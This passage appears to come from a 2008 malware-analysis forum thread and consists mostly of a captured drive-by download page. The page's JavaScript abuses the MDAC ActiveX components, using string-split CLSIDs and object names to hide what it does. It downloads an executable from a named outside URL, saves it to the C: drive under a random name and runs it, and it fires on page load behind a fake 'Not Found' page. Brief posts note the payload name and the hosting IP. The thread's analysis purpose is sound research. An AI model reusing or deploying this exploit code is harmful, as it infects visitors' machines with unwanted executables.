for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exec.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://www.direct84.com/load.php?MSIE';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { NUkI1pMSJzW9(0); }

}
</script>
</head>
<body onload="start()">

<H1>Not Found</H1><P>The requested URL / was not found on this server.</P>
<div id="BRB2vms"></div>
</body>
</html>

hm.....

download : ldr.exe

interesting : direct84.com is USA server not China server.

Created : 07-May-2008
ip : 71.68.36.44

May 12, 2008, 01:54:34 am
Reply #14

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net